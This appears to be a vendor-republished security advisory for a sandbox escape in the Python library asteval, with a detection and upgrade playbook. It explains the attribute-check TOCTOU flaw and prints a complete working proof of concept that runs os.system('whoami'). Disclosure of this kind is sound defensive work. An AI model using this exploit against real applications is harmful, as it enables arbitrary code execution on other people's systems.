GHSA-vp47-9734-prjw
HIGHASTEVAL Allows Malicious Tampering of Exposed AST Nodes Leads to Sandbox Escape
Blast Radius
astevalReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects PyPI packages — download data is not available via public APIs for these ecosystems.
Description
Summary
If an attacker can control the input to the asteval library, they can bypass its safety restrictions and execute arbitrary Python code within the application's context.
Details
The vulnerability is rooted in how asteval performs attribute access verification. In particular, the on_attribute node handler prevents access to attributes that are either present in the UNSAFE_ATTRS list or are formed by names starting and ending with __, as shown in the code snippet below:
def on_attribute(self, node): # ('value', 'attr', 'ctx')
"""Extract attribute."""
ctx = node.ctx.__class__
if ctx == ast.Store:
msg = "attribute for storage: shouldn't be here!"
self.raise_exception(node, exc=RuntimeError, msg=msg)
sym = self.run(node.value)
if ctx == ast.Del:
return delattr(sym, node.attr)
#
unsafe = (node.attr in UNSAFE_ATTRS or
(node.attr.startswith('__') and node.attr.endswith('__')))
if not unsafe:
for dtype, attrlist in UNSAFE_ATTRS_DTYPES.items():
unsafe = isinstance(sym, dtype) and node.attr in attrlist
if unsafe:
break
if unsafe:
msg = f"no safe attribute '{node.attr}' for {repr(sym)}"
self.raise_exception(node, exc=AttributeError, msg=msg)
else:
try:
return getattr(sym, node.attr)
except AttributeError:
pass
While this check is intended to block access to sensitive Python dunder methods (such as __getattribute__), the flaw arises because instances of the Procedure class expose their AST (stored in the body attribute) without proper protection:
class Procedure:
"""Procedure: user-defined function for asteval.
This stores the parsed ast nodes as from the 'functiondef' ast node
for later evaluation.
"""
def __init__(self, name, interp, doc=None, lineno=0,
body=None, args=None, kwargs=None,
vararg=None, varkws=None):
"""TODO: docstring in public method."""
self.__ininit__ = True
self.name = name
self.__name__ = self.name
self.__asteval__ = interp
self.raise_exc = self.__asteval__.raise_exception
self.__doc__ = doc
self.body = body
self.argnames = args
self.kwargs = kwargs
self.vararg = vararg
self.varkws = varkws
self.lineno = lineno
self.__ininit__ = False
Since the body attribute is not protected by a naming convention that would restrict its modification, an attacker can modify the AST of a Procedure during runtime to leverage unintended behaviour.
The exploit works as follows:
-
The Time of Check, Time of Use (TOCTOU) Gadget:
In the code below, a variable named
unsafeis set based on whethernode.attris considered unsafe:unsafe = (node.attr in UNSAFE_ATTRS or (node.attr.startswith('__') and node.attr.endswith('__'))) -
Exploiting the TOCTOU Gadget:
An attacker can abuse this gadget by hooking any
AttributeAST node that is not in theUNSAFE_ATTRSlist. The attacker modifies thenode.attr.startswithfunction so that it points to a custom procedure. This custom procedure performs the following steps:- It replaces the value of
node.attrwith the string"__getattribute__"and returnsFalse. - Thus, when
node.attr.startswith('__')is evaluated, it returnsFalse, which causes the condition to short-circuit and setsunsafetoFalse. - However, by that time,
node.attrhas been changed to"__getattribute__", which will be used in the subsequentgetattr(sym, node.attr)call. An attacker can then use the obtained reference tosym.__getattr__to retrieve malicious attributes without needing to pass theon_attributechecks.
- It replaces the value of
PoC
The following proof-of-concept (PoC) demonstrates how this vulnerability can be exploited to execute the whoami command on the host machine:
from asteval import Interpreter
aeval = Interpreter()
code = """
ga_str = "__getattribute__"
def lender():
a
b
def pwn():
ga = lender.dontcare
init = ga("__init__")
ga = init.dontcare
globals = ga("__globals__")
builtins = globals["__builtins__"]
importer = builtins["__import__"]
importer("os").system("whoami")
def startswith1(str):
# Replace the attr on the targeted AST node with "__getattribute__"
pwn.body[0].value.attr = ga_str
return False
def startswith2(str):
pwn.body[2].value.attr = ga_str
return False
n1 = lender.body[0]
n1.startswith = startswith1
pwn.body[0].value.attr = n1
n2 = lender.body[1]
n2.startswith = startswith2
pwn.body[2].value.attr = n2
pwn()
"""
aeval(code)
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐍PyPI | asteval | all versions | 1.0.6 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for asteval. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update asteval to 1.0.6 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-vp47-9734-prjw is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-vp47-9734-prjw is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-vp47-9734-prjw. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-vp47-9734-prjw in your dependencies?
O3 detects GHSA-vp47-9734-prjw across PyPI dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.